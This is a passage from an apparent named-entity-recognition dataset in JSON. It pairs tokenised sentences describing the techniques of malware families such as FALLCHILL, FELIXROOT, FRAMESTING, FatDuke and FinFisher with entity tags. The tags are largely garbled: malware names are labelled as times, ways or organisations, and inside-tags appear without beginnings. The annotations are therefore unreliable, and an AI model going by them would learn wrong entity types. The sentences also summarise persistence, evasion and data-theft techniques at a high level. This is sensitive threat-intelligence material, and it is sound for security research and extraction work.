"tokens": [ "Explosive", "has", "collected", "the", "computer", "name", "from", "the", "infected", "host." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Explosive", "has", "collected", "the", "MAC", "address", "from", "the", "victim's", "machine." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Explosive", "has", "collected", "the", "username", "from", "the", "infected", "host." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Explosive", "has", "used", "HTTP", "for", "communication." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "FALLCHILL", "can", "delete", "malware", "and", "associated", "artifacts", "from", "the", "victim." ], "ner_tags": [ "B-Way", "O", "B-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FALLCHILL", "can", "search", "files", "on", "a", "victim." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "FALLCHILL", "uses", "fake", "Transport", "Layer", "Security", "(TLS)", "to", "communicate", "with", "its", "C2", "server." ], "ner_tags": [ "B-Way", "O", "I-Tool", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FALLCHILL", "encrypts", "C2", "data", "with", "RC4", "encryption." ], "ner_tags": [ "B-Way", "B-Features", "B-Features", "B-Features", "O", "O", "O" ] }, { "tokens": [ "FALLCHILL", "can", "collect", "operating", "system", "(OS)", "version", "information,", "processor", "information,", "system", "name,", "and", "information", "about", "installed", "disks", "from", "the", "victim." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FALLCHILL", "collects", "MAC", "address", "and", "local", "IP", "address", "information", "from", "the", "victim." ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FALLCHILL", "can", "modify", "file", "or", "directory", "timestamps." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "FALLCHILL", "has", "been", "installed", "as", "a", "Windows", "service." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FELIXROOT", "encrypts", "collected", "data", "with", "AES", "and", "Base64", "and", "then", "sends", "it", "to", "the", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FELIXROOT", "encrypts", "strings", "in", "the", "backdoor", "using", "a", "custom", "XOR", "algorithm." ], "ner_tags": [ "B-Idus", "B-Features", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "FELIXROOT", "deletes", "the", ".LNK", "file", "from", "the", "startup", "directory", "as", "well", "as", "the", "dropper", "components." ], "ner_tags": [ "B-Way", "B-Features", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "FELIXROOT", "downloads", "and", "uploads", "files", "to", "and", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "B-Features", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FELIXROOT", "deletes", "the", "Registry", "key", "<code>HKCU\\Software\\Classes\\Applications\\rundll32.exe\\shell\\open</code>." ], "ner_tags": [ "B-Idus", "B-Features", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "FELIXROOT", "collects", "a", "list", "of", "running", "processes." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "FELIXROOT", "queries", "the", "Registry", "for", "specific", "keys", "for", "potential", "privilege", "escalation", "and", "proxy", "information.", "FELIXROOT", "has", "also", "used", "WMI", "to", "query", "the", "Windows", "Registry." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FELIXROOT", "adds", "a", "shortcut", "file", "to", "the", "startup", "folder", "for", "persistence." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FELIXROOT", "uses", "Rundll32", "for", "executing", "the", "dropper", "program." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "B-Org", "O" ] }, { "tokens": [ "FELIXROOT", "checks", "for", "installed", "security", "software", "like", "antivirus", "and", "firewall." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "FELIXROOT", "creates", "a", ".LNK", "file", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "I-SamFile", "O", "O" ] }, { "tokens": [ "FELIXROOT", "collects", "the", "victim’s", "computer", "name,", "processor", "architecture,", "OS", "version,", "volume", "serial", "number,", "and", "system", "type." ], "ner_tags": [ "B-Idus", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FELIXROOT", "collects", "information", "about", "the", "network", "including", "the", "IP", "address", "and", "DHCP", "server." ], "ner_tags": [ "B-Idus", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FELIXROOT", "collects", "the", "username", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FELIXROOT", "gathers", "the", "time", "zone", "information", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FELIXROOT", "uses", "HTTP", "and", "HTTPS", "to", "communicate", "with", "the", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FELIXROOT", "executes", "batch", "scripts", "on", "the", "victim’s", "machine,", "and", "can", "launch", "a", "reverse", "shell", "for", "command", "execution." ], "ner_tags": [ "B-Idus", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FELIXROOT", "uses", "WMI", "to", "query", "the", "Windows", "Registry." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIVEHANDS", "can", "receive", "a", "command", "line", "argument", "to", "limit", "file", "encryption", "to", "specified", "directories." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIVEHANDS", "can", "use", "an", "embedded", "NTRU", "public", "key", "to", "encrypt", "data", "for", "ransom." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIVEHANDS", "has", "the", "ability", "to", "decrypt", "its", "payload", "prior", "to", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "FIVEHANDS", "payload", "is", "encrypted", "with", "AES-128." ], "ner_tags": [ "O", "B-SamFile", "I-SamFile", "O", "O", "O", "B-Way" ] }, { "tokens": [ "FIVEHANDS", "has", "the", "ability", "to", "enumerate", "files", "on", "a", "compromised", "host", "in", "order", "to", "encrypt", "files", "with", "specific", "extensions." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "FIVEHANDS", "has", "the", "ability", "to", "delete", "volume", "shadow", "copies", "on", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIVEHANDS", "can", "enumerate", "network", "shares", "and", "mounted", "drives", "on", "a", "network." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIVEHANDS", "can", "use", "WMI", "to", "delete", "files", "on", "a", "target", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Features", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "FLASHFLOOD", "employs", "the", "same", "encoding", "scheme", "as", "SPACESHIP", "for", "data", "it", "stages.", "Data", "is", "compressed", "with", "zlib,", "and", "bytes", "are", "rotated", "four", "times", "before", "being", "XOR'ed", "with", "0x23." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FLASHFLOOD", "searches", "for", "interesting", "files", "(either", "a", "default", "or", "customized", "set", "of", "file", "extensions)", "on", "the", "local", "system.", "FLASHFLOOD", "will", "scan", "the", "My", "Recent", "Documents,", "Desktop,", "Temporary", "Internet", "Files,", "and", "TEMP", "directories.", "FLASHFLOOD", "also", "collects", "information", "stored", "in", "the", "Windows", "Address", "Book." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FLASHFLOOD", "searches", "for", "interesting", "files", "(either", "a", "default", "or", "customized", "set", "of", "file", "extensions)", "on", "removable", "media", "and", "copies", "them", "to", "a", "staging", "area.", "The", "default", "file", "types", "copied", "would", "include", "data", "copied", "to", "the", "drive", "by", "SPACESHIP." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "FLASHFLOOD", "searches", "for", "interesting", "files", "(either", "a", "default", "or", "customized", "set", "of", "file", "extensions)", "on", "the", "local", "system", "and", "removable", "media." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FLASHFLOOD", "stages", "data", "it", "copies", "from", "the", "local", "system", "or", "removable", "drives", "in", "the", "\"%WINDIR%\\$NtUninstallKB885884$\\\"", "directory." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FLASHFLOOD", "achieves", "persistence", "by", "making", "an", "entry", "in", "the", "Registry's", "Run", "key." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FLIPSIDE", "uses", "RDP", "to", "tunnel", "traffic", "from", "a", "victim", "environment." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "FRAMESTING", "can", "embed", "itself", "in", "the", "CAV", "Python", "package", "of", "an", "Ivanti", "Connect", "Secure", "VPN", "located", "in", "`/home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/category.py.`" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "B-SecTeam", "O", "O", "O" ] }, { "tokens": [ "FRAMESTING", "can", "send", "and", "receive", "zlib", "compressed", "data", "within", "`POST`", "requests." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FRAMESTING", "can", "decompress", "data", "received", "within", "`POST`", "requests." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FRAMESTING", "uses", "a", "cookie", "named", "`DSID`", "to", "mimic", "the", "name", "of", "a", "cookie", "used", "by", "Ivanti", "Connect", "Secure", "appliances", "for", "maintaining", "VPN", "sessions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SecTeam", "I-SecTeam", "I-SecTeam", "I-SecTeam", "O", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "FRAMESTING", "is", "a", "Python", "web", "shell", "that", "can", "embed", "in", "the", "Ivanti", "Connect", "Secure", "CAV", "Python", "package." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FRAMESTING", "can", "retrieve", "C2", "commands", "from", "values", "stored", "in", "the", "`DSID`", "cookie", "from", "the", "current", "HTTP", "request", "or", "from", "decompressed", "zlib", "data", "within", "the", "request's", "`POST`", "data." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FRAMESTING", "is", "a", "web", "shell", "capable", "of", "enabling", "arbitrary", "command", "execution", "on", "compromised", "Ivanti", "Connect", "Secure", "VPNs." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FYAnti", "has", "the", "ability", "to", "decrypt", "an", "embedded", ".NET", "module." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "FYAnti", "can", "search", "the", "<code>C:\\Windows\\Microsoft.NET\\</code>", "directory", "for", "files", "of", "a", "specified", "size." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FYAnti", "can", "download", "additional", "payloads", "to", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "FYAnti", "has", "used", "ConfuserEx", "to", "pack", "its", ".NET", "module." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "B-Way", "B-SamFile" ] }, { "tokens": [ "FakeM", "contains", "a", "keylogger", "module." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Some", "variants", "of", "FakeM", "use", "SSL", "to", "communicate", "with", "C2", "servers." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FakeM", "C2", "traffic", "attempts", "to", "evade", "detection", "by", "resembling", "data", "generated", "by", "legitimate", "messenger", "applications,", "such", "as", "MSN", "and", "Yahoo!", "messengers.", "Additionally,", "some", "variants", "of", "FakeM", "use", "modified", "SSL", "code", "for", "communications", "back", "to", "C2", "servers,", "making", "SSL", "decryption", "ineffective." ], "ner_tags": [ "B-Way", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O" ] }, { "tokens": [ "The", "original", "variant", "of", "FakeM", "encrypts", "C2", "traffic", "using", "a", "custom", "encryption", "cipher", "that", "uses", "an", "XOR", "key", "of", "“YHCRA”", "and", "bit", "rotation", "between", "each", "XOR", "operation.", "Some", "variants", "of", "FakeM", "use", "RC4", "to", "encrypt", "C2", "traffic." ], "ner_tags": [ "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "FatDuke", "has", "been", "packed", "with", "junk", "code", "and", "strings." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FatDuke", "can", "copy", "files", "and", "directories", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "FatDuke", "can", "decrypt", "AES", "encrypted", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "FatDuke", "has", "used", "several", "C2", "servers", "per", "targeted", "organization." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FatDuke", "can", "secure", "delete", "its", "DLL." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FatDuke", "can", "enumerate", "directories", "on", "target", "machines." ], "ner_tags": [ "B-Way", "O", "B-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "FatDuke", "can", "used", "pipes", "to", "connect", "machines", "with", "restricted", "internet", "access", "to", "remote", "machines", "via", "other", "infected", "hosts." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FatDuke", "has", "attempted", "to", "mimic", "a", "compromised", "user's", "traffic", "by", "using", "the", "same", "user", "agent", "as", "the", "installed", "browser." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "B-Features", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "FatDuke", "can", "call", "<code>ShellExecuteW</code>", "to", "open", "the", "default", "browser", "on", "the", "URL", "localhost." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FatDuke", "can", "use", "base64", "encoding,", "string", "stacking,", "and", "opaque", "predicates", "for", "obfuscation." ], "ner_tags": [ "B-Way", "O", "O", "B-HackOrg", "B-Features", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FatDuke", "has", "the", "ability", "to", "execute", "PowerShell", "scripts." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "FatDuke", "can", "list", "running", "processes", "on", "the", "localhost." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "FatDuke", "can", "get", "user", "agent", "strings", "for", "the", "default", "browser", "from", "<code>HKCU\\Software\\Classes\\http\\shell\\open\\command</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FatDuke", "has", "used", "<code>HKLM\\SOFTWARE\\Microsoft\\CurrentVersion\\Run</code>", "to", "establish", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "FatDuke", "can", "execute", "via", "rundll32." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "FatDuke", "has", "been", "regularly", "repacked", "by", "its", "operators", "to", "create", "large", "binaries", "and", "evade", "detection." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FatDuke", "can", "AES", "encrypt", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FatDuke", "can", "collect", "the", "user", "name,", "Windows", "version,", "computer", "name,", "and", "available", "space", "on", "discs", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FatDuke", "can", "identify", "the", "MAC", "address", "on", "the", "target", "computer." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FatDuke", "can", "turn", "itself", "on", "or", "off", "at", "random", "intervals." ], "ner_tags": [ "B-Way", "O", "B-Features", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FatDuke", "can", "be", "controlled", "via", "a", "custom", "C2", "protocol", "over", "HTTP." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "B-Way" ] }, { "tokens": [ "Felismus", "can", "download", "files", "from", "remote", "servers." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Felismus", "has", "masqueraded", "as", "legitimate", "Adobe", "Content", "Management", "System", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Felismus", "checks", "for", "processes", "associated", "with", "anti-virus", "vendors." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Org", "O" ] }, { "tokens": [ "Some", "Felismus", "samples", "use", "a", "custom", "method", "for", "C2", "traffic", "that", "utilizes", "Base64." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Some", "Felismus", "samples", "use", "a", "custom", "encryption", "method", "for", "C2", "traffic", "that", "utilizes", "AES", "and", "multiple", "keys." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Felismus", "collects", "the", "system", "information,", "including", "hostname", "and", "OS", "version,", "and", "sends", "it", "to", "the", "C2", "server." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Felismus", "collects", "the", "victim", "LAN", "IP", "address", "and", "sends", "it", "to", "the", "C2", "server." ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Felismus", "collects", "the", "current", "username", "and", "sends", "it", "to", "the", "C2", "server." ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Felismus", "uses", "HTTP", "for", "C2." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Felismus", "uses", "command", "line", "for", "execution." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ferocious", "can", "use", "COM", "hijacking", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Ferocious", "can", "delete", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "B-SamFile", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Ferocious", "has", "the", "ability", "to", "add", "a", "Class", "ID", "in", "the", "current", "user", "Registry", "hive", "to", "enable", "persistence", "mechanisms." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "B-Features", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ferocious", "can", "run", "<code>GET.WORKSPACE</code>", "in", "Microsoft", "Excel", "to", "check", "if", "a", "mouse", "is", "present." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ferocious", "can", "use", "PowerShell", "scripts", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "Ferocious", "has", "checked", "for", "AV", "software", "as", "part", "of", "its", "persistence", "process." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ferocious", "can", "run", "anti-sandbox", "checks", "using", "the", "Microsoft", "Excel", "4.0", "function", "<code>GET.WORKSPACE</code>", "to", "determine", "the", "OS", "version,", "if", "there", "is", "a", "mouse", "present,", "and", "if", "the", "host", "is", "capable", "of", "playing", "sounds." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ferocious", "can", "use", "<code>GET.WORKSPACE</code>", "in", "Microsoft", "Excel", "to", "determine", "the", "OS", "version", "of", "the", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ferocious", "has", "the", "ability", "to", "use", "Visual", "Basic", "scripts", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "Fgdump", "can", "dump", "Windows", "password", "hashes." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "FinFisher", "contains", "junk", "code", "in", "its", "functions", "in", "an", "effort", "to", "confuse", "disassembly", "programs." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Purp", "O" ] }, { "tokens": [ "Some", "FinFisher", "variants", "incorporate", "an", "MBR", "rootkit." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "FinFisher", "performs", "UAC", "bypass." ], "ner_tags": [ "B-Org", "O", "O", "O" ] }, { "tokens": [ "FinFisher", "clears", "the", "system", "event", "logs", "using", "<code>", "OpenEventLog/ClearEventLog", "APIs", "</code>." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "FinFisher", "hooks", "processes", "by", "modifying", "IAT", "pointers", "to", "CreateWindowEx." ], "ner_tags": [ "B-Org", "O", "O", "O", "B-Way", "B-Way", "O", "O", "O" ] }, { "tokens": [ "A", "FinFisher", "variant", "uses", "DLL", "search", "order", "hijacking." ], "ner_tags": [ "O", "B-Way", "O", "O", "B-Way", "I-Way", "I-Way", "O" ] }, { "tokens": [ "FinFisher", "uses", "DLL", "side-loading", "to", "load", "malicious", "programs." ], "ner_tags": [ "B-Org", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FinFisher", "extracts", "and", "decrypts", "stage", "3", "malware,", "which", "is", "stored", "in", "encrypted", "resources." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FinFisher", "injects", "itself", "into", "various", "processes", "depending", "on", "whether", "it", "is", "low", "integrity", "or", "high", "integrity." ], "ner_tags": [ "B-Org", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FinFisher", "enumerates", "directories", "and", "scans", "for", "certain", "files." ], "ner_tags": [ "B-Org", "O", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FinFisher", "has", "used", "the", "<code>KernelCallbackTable</code>", "to", "hijack", "the", "execution", "flow", "of", "a", "process", "by", "replacing", "the", "<code>__fnDWORD</code>", "function", "with", "the", "address", "of", "a", "created", "Asynchronous", "Procedure", "Call", "stub", "routine." ], "ner_tags": [ "B-Org", "O", "O", "O", "B-Way", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FinFisher", "renames", "one", "of", "its", ".dll", "files", "to", "uxtheme.dll", "in", "an", "apparent", "attempt", "to", "masquerade", "as", "a", "legitimate", "file." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FinFisher", "is", "heavily", "obfuscated", "in", "many", "ways,", "including", "through", "the", "use", "of", "spaghetti", "code", "in", "its", "functions", "in", "an", "effort", "to", "confuse", "disassembly", "programs.", "It", "also", "uses", "a", "custom", "XOR", "algorithm", "to", "obfuscate", "code." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-Purp", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "FinFisher", "checks", "its", "parent", "process", "for", "indications", "that", "it", "is", "running", "in", "a", "sandbox", "setup." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FinFisher", "queries", "Registry", "values", "as", "part", "of", "its", "anti-sandbox", "checks." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FinFisher", "establishes", "persistence", "by", "creating", "the", "Registry", "key", "<code>HKCU\\Software\\Microsoft\\Windows\\Run</code>." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", 